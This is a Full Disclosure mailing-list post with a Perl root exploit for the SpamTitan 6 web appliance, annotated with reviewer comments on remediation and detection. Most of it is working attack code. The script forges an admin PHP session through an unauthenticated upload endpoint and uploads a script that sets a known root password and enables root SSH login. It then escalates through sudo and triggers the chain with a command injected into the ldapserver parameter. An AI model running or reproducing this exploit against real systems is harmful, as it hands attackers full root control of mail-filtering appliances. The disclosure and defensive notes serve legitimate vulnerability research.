Full Disclosure mailing list archives
spamtitan 6 root exploit
From: c1088422 () lists grok org uk
Date: Tue, 19 Nov 2013 10:35:27 +0000 (GMT)
# root access on spamtitan
#
# Reviewer summary (defender's view). As posted, the script chains three
# weaknesses of the appliance's web UI, each visible in the requests below:
#   1. /custpdf.php with jaction=savelogo stores an uploaded file under a
#      file name chosen by the client. No session cookie is sent with these
#      uploads, so the endpoint apparently does not require a login.
#   2. /aliases-x.php apparently places the "ldapserver" query parameter
#      into a shell command line; the value sent below is a ';'-delimited
#      command.
#   3. The uploaded payload runs cp, chmod and cfma-mirror.sh through sudo.
#      NOTE(review): presumably the web-server account has password-less
#      sudo rules for these commands -- confirm in the appliance's sudoers.
#
# Remediation: require authentication on the upload handler, generate the
# stored file name server-side and keep uploads out of the session and
# script directories, pass the LDAP host to the helper as an argument that
# never reaches a shell, and do not let the web account run file-copy or
# writable scripts via sudo.
#
# Detection: look for POSTs to /custpdf.php whose upload name starts with
# "sess_" or ends in ".sh", requests to /aliases-x.php with shell
# metacharacters in ldapserver, a changed /usr/local/bin/cfma-mirror.sh,
# "PermitRootLogin yes" in /etc/ssh/sshd_config, and a changed root
# password hash.
use LWP::UserAgent;

# Placeholder base URL of the web UI, as posted.
my $url = 'http://address';
my $ua = LWP::UserAgent->new();

# Step 1: session forgery through the upload handler.
# The heredoc is written in PHP's session serialization format and sets
# admin|b:1 plus the Administrator role fields.
my $p = <<'END';
euid|i:2;uid|i:2;name|s:5:"admin";expiry|i:1500000000;locale|s:5:"en_US";admin|b:1;licenseStatus|i:3;licenseNumber|N;licenseType|N;licenseIssuedDate|N;licenseExpiryDate|N;licenseUpdateDate|N;role_id|i:1;role_name|s:13:"Administrator";role_type|N;s:5:"admin";full_admin_role|b:1;
END

# The upload name "sess_<id>" follows the naming of PHP's file-based session
# store. NOTE(review): this only works if uploads land in the directory PHP
# uses as session.save_path -- presumably /tmp, given the /tmp paths used
# further down; confirm on the appliance.
$ua->post($url . '/custpdf.php',
  [ 'jaction' => 'savelogo',
    'logo' => [ undef, 'sess_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', 'Content' => $p ],
  ],
  'Content_Type' => 'form-data'
);

# The author's manual check: present the matching session id to the UI.
# in javascript console
# document.cookie = 'PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';
# document.location = '/dashboard.php'

# Step 2: upload the script that is later run as root. Its contents remount
# / read-write, set the root password hash, switch PermitRootLogin to yes
# and signal sshd to reload -- all of which leave persistent, auditable
# changes on the host.
my $p = <<'END';
#!/bin/sh
mount -uw /
chpass -p '$1$TN65SZOW$Ayua2/j.GsQfIQb9UBeTd.' root # "1"
perl -pi -e 's/PermitRootLogin no/PermitRootLogin yes/g' /etc/ssh/sshd_config
pkill -HUP sshd
END

$ua->post($url . '/custpdf.php',
  [ 'jaction' => 'savelogo',
    'logo' => [ undef, 'cfma-mirror.sh', 'Content' => $p ],
  ],
  'Content_Type' => 'form-data'
);

# Step 3: upload a wrapper that uses sudo to copy the script from /tmp over
# /usr/local/bin/cfma-mirror.sh, mark it executable and run it. Being able to
# overwrite a script that sudo will then execute is the privilege-escalation
# step; sudo rules should never cover both "write this file" and "run it".
my $p = <<'END';
/usr/local/bin/sudo /bin/cp /tmp/cfma-mirror.sh /usr/local/bin/cfma-mirror.sh;
/usr/local/bin/sudo /bin/chmod a+x /usr/local/bin/cfma-mirror.sh;
/usr/local/bin/sudo /usr/local/bin/cfma-mirror.sh;
END

$ua->post($url . '/custpdf.php',
  [ 'jaction' => 'savelogo',
    'logo' => [ undef, 'payload.sh', 'Content' => $p ],
  ],
  'Content_Type' => 'form-data'
);

# Step 4: trigger the wrapper through the ldapserver parameter, sending the
# forged session id as the cookie. Server-side, this parameter should be
# validated as a host name and handed to the LDAP helper without a shell.
$ua->get($url . '/aliases-x.php?getLdapDC=foo&ldapserver=;sh /tmp/payload.sh;',
  ( 'Cookie' => 'PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' ));

# The script does not inspect any HTTP response; this message is printed
# whether or not the requests above succeeded.
print "root shell ready with password 1\n";